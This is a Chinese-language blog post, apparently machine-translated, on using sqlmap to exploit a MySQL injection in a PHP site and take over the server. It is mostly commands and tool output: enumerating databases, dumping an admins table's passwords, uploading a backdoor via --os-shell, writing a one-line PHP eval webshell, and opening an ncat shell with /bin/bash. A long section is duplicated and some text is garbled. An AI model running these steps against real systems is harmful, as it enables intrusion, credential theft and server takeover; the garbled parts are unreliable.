使用sqlmap进行MySQL注入并渗透某服务器
本文作者:simeon本文属于安全脉搏原创金币奖励计划文章,转载请参考:https://www.secpulse.com/archives/61458.htmlsqlmap功能强大,在某些情况下,通过…
本文作者:simeon
本文属于安全脉搏原创金币奖励计划文章,
转载请参考:https://www..com/archives/61458.html
Sqlmap功能强大。在某些情况下,您可以通过SQL注入直接获取webshell权限,甚至可以获得Windows或Linux服务器权限。这是一个如何获得服务器权限的真实示例。
1、检测SQL注入点
可以通过扫描软件扫描,手动测试和读取代码来判断SQL注入点。一旦找到SQL注入,就可以直接检测到它,如图1所示,并执行:
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263
可以获得信息:
Web 服务器 操作 系统: Windows
Web 应用程序 技术: PHP 5.4.34, Apache 2.4.10
后端 DBMS: MySQL >= 5.0.12
提示消息告诉您SQL注入点是基于时间的盲注。
图1检测当前的SQL注入点是否可用
2、获取当前数据库信息
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263 --current-db
获取当前数据库为“Sshgdsys”,如图2所示。
图2获取当前数据库
3、获取当前数据库表
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys --tables
基于时间的注射:
做 你 想要 sqlmap 到 尝试 到 优化 值 用于 DBMS 延迟 响应 (选项 '-time-sec')? [Y/n] y
图3获取了数据库中的表
4、获取admins表列和数据
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys -T admins --columns
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys -T admins -C id ,adminpass adminname -dump
5、获取webshell
(1)获取网站信息
能够获得webshell的先决条件是能够确定网站的真实路径,并且可以编写目录的权限。通常使用--os-shell参数获得。执行订单:
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263 --os-shell
哪个 web 应用程序 语言 做 web 服务器 支持?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (默认)
选择Web应用程序类型,选择4,开始获取网站的根目录以及存在漏洞的程序的路径。效果如图4所示。
[10: 18: 46] [INFO] 检索到 web 服务器 文档 根: 'E: \ xampp \ htdocs'
[10: 18: 46] [INFO] 检索到 web 服务器 绝对 路径: 'E: /xampp/htdocs/sshgdsys/fb/modify.php'
[10: 18: 46] [INFO] 尝试 至 上传 文件 stager on 'E:/xampp/htdocs /' via LIMIT 'LINES TERMINATED BY' method
[10: 18: 48] [INFO] 启发式检测 web page charset 'utf-8'
[10: 18: 48] [INFO] 文件 stager 有 已成功 已上传 在 'E:/xampp/htdocs /' - http://***。**。** 。**: 8081/tmpuqioc.php
[10: 18: 48] [INFO] 启发式检测 web page charset 'ascii'
[10: 18: 48] [INFO] 后门 有 已成功 已上传 在 'E:/xampp/htdocs /' - http://***。**。**。* *: 8081/tmpbboab.php
[10: 18: 48] [INFO] 调用 OS shell。 至 退出 类型 'x' 或 'q' 和 按 ENTER
图4获取了网站的真实路径和当前目录
(2)获取webshell
直接在sqlmap命令提示符窗口中输入:
Echo'<php @eval($ _ POST ['chopper']);>' > 1.php在当前路径中生成1.php。
获取webshell:http://***。**。**。**: 8081/1.php密码为:chopper
您可以通过执行命令womamai来获取系统权限,如图5所示。
图5获取系统权限
6、总结及技巧
(1)自动提交注射参数和智能:sqlmap.py -u url --batch --smart
(2)获取所有信息:sqlmap.py -u url --batch -smart -a
(3)导出数据库:sqlmap.py -u url --dump-all
(4)直接连接数据库:python sqlmap.py -d'mysql: //admin: admin@192.168.21.17: 3306/testdb'-f --banner --dbs -users,例如,root帐号直接获得shell:
Python sqlmap.py -d'mysql: //root: 123456@192.168.21.17: 3306/mysql'-os-shell
(5)获取webshell: sqlmap.py -u url -os-shell
(6)实现linux下的反弹:
Ncat -l -p 2333 -e/bin/bash
Ncat targetip 2333
图1检测当前的SQL注入点是否可用
2、获取当前数据库信息
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263 --current-db
获取当前数据库为“Sshgdsys”,如图2所示。
图2获取当前数据库
3、获取当前数据库表
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys --tables
基于时间的注射:
做 你 想要 sqlmap 到 尝试 到 优化 值 用于 DBMS 延迟 响应 (选项 '-time-sec')? [Y/n] y
图3获取了数据库中的表
4、获取admins表列和数据
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys -T admins --columns
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys -T admins -C id ,adminpass adminname -dump
5、获取webshell
(1)获取网站信息
能够获得webshell的先决条件是能够确定网站的真实路径,并且可以编写目录的权限。通常使用--os-shell参数获得。执行订单:
Sqlmap.py -u http://***。**。**。**: 8081/sshgdsys/fb/modify.php?id=263 --os-shell
哪个 web 应用程序 语言 做 web 服务器 支持?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (默认)
选择Web应用程序类型,选择4,开始获取网站的根目录以及存在漏洞的程序的路径。效果如图4所示。
[10: 18: 46] [INFO] 检索到 web 服务器 文档 根: 'E: \ xampp \ htdocs'
[10: 18: 46] [INFO] 检索到 web 服务器 绝对 路径: 'E: /xampp/htdocs/sshgdsys/fb/modify.php'
[10: 18: 46] [INFO] 尝试 至 上传 文件 stager on 'E:/xampp/htdocs /' via LIMIT 'LINES TERMINATED BY' method
[10: 18: 48] [INFO] 启发式检测 web page charset 'utf-8'
[10: 18: 48] [INFO] 文件 stager 有 已成功 已上传 在 'E:/xampp/htdocs /' - http://***。**。** 。**: 8081/tmpuqioc.php
[10: 18: 48] [INFO] 启发式检测 web page charset 'ascii'
[10: 18: 48] [INFO] 后门 有 已成功 已上传 在 'E:/xampp/htdocs /' - http://***。**。**。* *: 8081/tmpbboab.php
[10: 18: 48] [INFO] 调用 OS shell。 至 退出 类型 'x' 或 'q' 和 按 ENTER
图4获取了网站的真实路径和当前目录
(2)获取webshell
直接在sqlmap命令提示符窗口中输入:
Echo'<php @eval($ _ POST ['chopper']);>' > 1.php在当前路径中生成1.php。
获取webshell:http://***。**。**。**: 8081/1.php密码为:chopper
您可以通过执行命令womamai来获取系统权限,如图5所示。
图5获取系统权限
6、总结及技巧
(1)自动提交注射参数和智能:sqlmap.py -u url --batch --smart
(2)获取所有信息:sqlmap.py -u url --batch -smart -a
(3)导出数据库:sqlmap.py -u url --dump-all
(4)直接连接数据库:python sqlmap.py -d'mysql: //admin: admin@192.168.21.17: 3306/testdb'-f --banner --dbs -users,例如,root帐号直接获得shell:
Python sqlmap.py -d'mysql: //root: 123456@192.168.21.17: 3306/mysql'-os-shell
(5)获取webshell: sqlmap.py -u url -os-shell
(6)实现linux下的反弹:
Ncat -l -p 2333 -e/bin/bash
Ncat targetip 2333
- 发表于 2017-10-25 08:00
- 阅读 ( 570 )
- 分类:黑客技术
